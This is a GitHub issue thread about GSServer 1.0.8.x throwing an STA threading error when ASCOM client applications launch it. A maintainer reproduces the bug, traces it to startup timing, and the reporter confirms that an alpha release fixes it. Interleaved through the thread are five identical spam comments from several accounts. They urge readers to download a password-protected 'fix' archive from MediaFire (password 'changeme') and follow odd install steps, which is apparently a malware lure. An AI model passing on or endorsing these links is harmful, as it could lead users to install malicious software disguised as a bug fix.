### ISSUE TITLE
v1.0.8.5 gives an eror when used with ASCOM 7, RC5

### ISSUE THREAD

**Issue by han-k59** [rmorgan001/GSServer#73]
**Describe the bug**
 I have a Win 7.1 system and ASCOM 7, RC5 installed.

GSS version 1.0.5 worked fine.

Upgraded to 1.0.8.5 and also tried 1.0. 8.1 but both throw an error if GSS is started from an application (CCDCiel and Sky simulator for ASCOM). The error is as follows:.  

**ASCOM.GS.Sky.Telescope: Connection error: The calling thread must be STA, because many UI components require this.**

If I first start GSS manually using the desktop icon prior to starting the other applications then it all runs and connect normal. So starting GSS from the other applications is the problem.

Han

**Comment by Principia4834** [comment]
Han, thanks for the report. I confirm that I can reproduce it using Windows 7.1, 32 bit with ASCOM 7, RC5 installed. Andy

**Comment by Principia4834** [comment]
Han, I have found the source of the error, a null user interface reference exposed by startup timing differences between COM server launch and desktop double click launch. There is an active pull request #75 which will need go though our approval and release procedures

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by han-k59** [comment]
The alpha release from yesterday worked fine for me in Win7.1.  Thanks.

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
